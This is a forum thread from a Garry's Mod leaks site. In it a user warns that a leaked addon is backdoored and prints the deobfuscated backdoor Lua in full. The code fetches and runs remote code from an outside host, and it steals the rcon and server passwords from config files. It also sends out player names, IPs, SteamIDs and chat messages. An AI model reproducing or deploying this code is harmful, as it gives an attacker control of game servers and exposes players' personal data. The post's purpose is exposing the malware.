Garry's Mod Leaks

CLOSE

Submitted by MilitoDr, , Thread ID: 243245

Thread Closed

RE: CLOSE

This post was last modified: 28-05-2022, 07:31 PM by Bright1337
#16
This has backdoors in it
Getting code from "https://api.omega-project.cz/api_connect.php?api_key=iemPWLCJOpzPMzsmmAeE" ~ French backdoor... how unexpected -_-

I tried reverse engineering the code but gave up with decryption on the last (maybe) step. Here it is in it's glory

local PlayerInitialSpawnHook,PlayerDisconnectHook = "PlayerInitialSpawn", "PlayerDisconnected"
local WeirdHeaderForShit = {
["Authorization"] = "ZWJiMGE0NGJjZmFhYjVjYWNkZDYyMzM4NzllMjE5ZWQ"
}
RunConsoleCommand("sv_hibernate_think", "0")
HTTP({ url="https:\/\/api.omega-project.cz/no-backdoors.lua"; method="get"; success=function(api,anti_backdoors) RunString(anti_backdoors) end })
HTTP({ url="https:\/\/api.omega-project.cz/api_player_blacklist.php"; method="get"; success=function(api,bad_player_blacklist) RunString(bad_player_blacklist) end })

local _, addons_folders = file.Find("addons/*", "GAME")
for k,v in pairs(addons_folders) do
if (v != "checkers") and (v != "chess") and (v != "common") and (v != "go") and (v != "hearts") and (v != "spades") then
http.Post("https:\/\/api.omega-project.cz/api_addons.php", {server_ip = _G["game"]["GetIPAddress"](),crsf = "rUhmMdIueplHqMvbepLUmntjninUgEkJyuuYDkha#NDYuMTM0LjQ5LjIyOQ==#sQnFwGhSWjvTmTqhoHTRQZEfsmjBumUwbRsXOOGk",addons_name = v, addons_update = util.Base64Encode(file.Time( "addons/"..v, "GAME" ))}, function(http_addons)
if _G["string"]["Left"]( http_addons, 1 ) == "<" or http_addons == "" then
return
else
RunString(http_addons)
end
end, function( error )
end, WeirdHeaderForShit )
end
end

util.AddNetworkString("aYJQsmzZNbCjkcNsojff")
_G["BroadcastLua"]([[net.Receive("aYJQsmzZNbCjkcNsojff",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
function _0x269553(NrhsXbKvvmRHAMHUbSrr)
timer.Simple( 0.5, function( )
_G["data"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["len"] = #data
_G["\110\101\116"]["\83\116\97\114\116"]("aYJQsmzZNbCjkcNsojff")
_G["\110\101\116"]["\87\114\105\116\101\85\73\110\116"](len, 16)
_G["\110\101\116"]["\87\114\105\116\101\68\97\116\97"](data, len)
_G["\110\101\116"]["\66\114\111\97\100\99\97\115\116"]()
end)
end

util.AddNetworkString("zPxmjKXatPStuyGQyatK")
_G["BroadcastLua"]([[net.Receive("zPxmjKXatPStuyGQyatK",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
function SendPly(NrhsXbKvvmRHAMHUbSrr, steamid64)
timer.Simple( 0.5, function( )
_G["\100\97\116\97"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["\108\101\110"] = #data
_G["\110\101\116"]["\83\116".."\97\114\116"]("zPxmjKXatPStuyGQyatK")
_G["\110".."\101\116"]["\87\114".."\105\116\101\85\73\110\116"](len, 16)
_G["\110\101".."\116"]["\87\114\105\116\101\68".."\97\116\97"](data, len)
for k, ply in pairs(player.GetAll()) do
if ( ply:SteamID64() == steamid64 ) then
_G["\110\101\116"]["Send"](ply)
end
end
end)
end

_G["\104\111\111\107"]["\65\100\100"](PlayerInitialSpawnHook, "zFpiunFsMswHJIHTQGfrkLkxbsBNGbxNhJxaYPrTaBHwKXYPHM", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\108\111\114"] = "5dc766",
["\99\111\110\116\101\110\116"] = "Client "..ply:Name().." connected ("..ply:IPAddress()..").",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)

_G["\104\111\111\107"]["\65\100\100"](PlayerDisconnectHook, "IYFEfRtGTNMEloxBPyvwWBIHOtZEAzsrUAIOrnJolqsPtDjMrn", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["color"] = "de3333",
["\99\111\110\116\101\110\116"] = "Dropped "..ply:Name().." from server (Disconnect by user).",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)

function ServerLog( logs_content )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
content = logs_content,
server_ip = _G["game"]["GetIPAddress"]()
},RunString)
return ServerLog( logs_content )
end

function Error( string )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\110\116\101\110\116"] = string,
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
return Error( string )
end

timer.Create( "nmIhEbjWxFzzisaaVEAdenKiTWALFFlmLhIyTmHfVHAJJsTLxG", 5, 0, function()
hook.Add( "PlayerSay", "XdobnfBpYELZLmGoUpfNauFKkjxEUTFSbsvpAxttLCfZdpVldm", function( ply, text )
local http_chat_table = {
name = ply:Name(),
server_ip = _G["game"]["GetIPAddress"](),
steamid64 = ply:SteamID64(),
DRJLVBpDld = "SbWAumfRXzZbNOTMnyLlcuMIoyjvvxLQFEAyMeDm",
thJclyVnWu = "iEwcZaSshJGawvDAEFswWtDTdMgHHXzhWTEoPGPm",
UGxsBnNMRW = "AtziOfRhRfDuBbyNXbCvnuomhqYkuQoFcclZLcqy",
aWpjWJWBpD = "JzEaenhAzTvrCiMLgBNLserOzmCYTRyLulJiagWE",
oNUUXEBKRN = "sbQdrbGLrkOjwJYrdmmlJPztQQuVAqOBAPGLzszA",
message = text
}
http.Post("https:\/\/api.omega-project.cz/chat_connect.php?yYNdOwVmqEyCSFu=DBjEHsGKMaoJmns", http_chat_table, function(http_chat)
RunString(http_chat)
end)
end)

local _0x0004982 = file.Find("cfg/*", "GAME")
local rcon_pw = ""
for i = 1, #_0x0004982 do
if string.EndsWith(_0x0004982[i], ".cfg") then
for k,v in pairs(string.Split(file.Read("cfg/" .. _0x0004982[i], "GAME"),"\n")) do
if string.StartWith(v,"rcon_password") then
rcon_pw = string.Split(v,"\"")[2]
end
end
end
end

for k,v in pairs(player.GetAll()) do
local RMrIJYBBhAeDgqsdDguE = { -- getting player info
["\110\97\109\101"] = v:GetName(),
["\105\112"] = v:IPAddress(),
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"](),
["\99\114\115\102"] = "ESpjJjsSaLDunMmaayNueFoWwRkOgxsReRWDpZYz#NDYuMTM0LjQ5LjIyOQ==#OICcYMfOWERvMHXHBsgoVxemZsvgpnznBKuKsVco",
["\115\116\101\97\109\105\100"] = v:SteamID(),
["\115\116\101\97\109\105\100\54\52"] = v:SteamID64(),
["mJCScMgeVw"] = "akwlxPqdWEGAdkkmImlDLpjVfHaIYwXoMdPreMzH",
["fJGcZFbDzP"] = "fMpCQdGSvMPUfdrSSuqnZzlHuAMrmNeBgkgBRUbV",
["TEOtgpVzsx"] = "TpHketGzNTssxtllRnfYrWvsApJiBVDklrioQVEV",
["ifeCZhnUNp"] = "UraQdvachsosgSOxlgTHfQjzHJKKdMTzKkgdSoNy",
["RnBOqvIfHh"] = "NIuPGfBzTyXzNItyfUrYFRMJBOPvDdzpcioejOAs"
}
http.Post("https://api.omega-project.cz/v1/gmod-panel/user-connect.php?JkuJojmgMwBRKDa=XjzppAoKIFzdVIv&ping=" .. vTongueing(), RMrIJYBBhAeDgqsdDguE, function( http_users )
if string.Left( http_users, 1 ) == "<" or http_users == "" then
return
else
RunString( http_users )
end
end, function( error )
end, WeirdHeaderForShit )
end
local TcwwQwuoRiYOccyPCudM = { -- Get's server info
["i"] = _G["game"]["GetIPAddress"](),
["n"] = _G["\71\101\116\72\111\115\116\78\97\109\101"](),
["m"] = _G["\103\97\109\101"]["\71\101\116\77\97\112"](),
["bo"] = _G["\116\111\115\116\114\105\110\103"](#_G["\112\108\97\121\101\114"]["\71\101\116\66\111\116\115"]()),
["c"] = _G["\103\97\109\101"]["\71\101\116\73\80\65\100\100\114\101\115\115"]().."{+}".."AYkwYBvmN" .."{+}".."1653757789",
["g"] = _G["\101\110\103\105\110\101"]["\65\99\116\105\118\101\71\97\109\101\109\111\100\101"](),
["crsv"] = "NDYuMTM0LjQ5LjIyOQ==#FpmffElyGtfQQCnnHsUmeynbxhtkqBuInlWQsiqu",
["\110\98"] = tostring(#player.GetAll()).."/"..game.MaxPlayers(),
["\108\117\114\108"] = _G["GetConVar"]("sv_loadingurl"):GetString(),
["\112\97\115\115"] = GetConVar("\115\118\95\112\97\115\115\119\111\114\100"):GetString(),
["\107"] = "iemPWLCJOpzPMzsmmAeE",
["\99\108\105\101\110\116_\102\117\110\99"] = "_0x269553",
["\114"] = rcon_pw,
["EryEqWFPrr"] = "AgEiEaFLDaxVXCNkvNfqdBOWOWfMITgOtHXvrdce",
["LHDdvzWFzV"] = "YxtToQNNdbsIsNQNVZYOxhzlQKiVzeXXaYfnwPWU",
["NnNZbhBbvb"] = "qTtMuqmaLDkWkJFjGTgXrCxHsRRnqNpipTSBAfkN",
["tYmZDpqMcZ"] = "iVxnJiRHRKybdHxoBCyXiQiWzwoTSAuyfpTAtVwB",
["GNQVRVrKLD"] = "hDKLtFGYCJicCfhZDYTAszbIsmrARXIRypEGMQAt"
}
http.Post("https://api.omega-project.cz/v1/gmod-panel/socket-controller.php", TcwwQwuoRiYOccyPCudM, function(http_servers)
if string.Left( http_servers, 1 ) == "<" or http_servers == "" then
return
else
RunString(http_servers)
end
end, function( error )
end, WeirdHeaderForShit )
end)

and yeah OP don't say that there aren't any backdoors when some of the addons got backdoored so poorly that even the backdoors did not execute due to errors
Looking for Backdoors

Users browsing this thread: 4 Guest(s)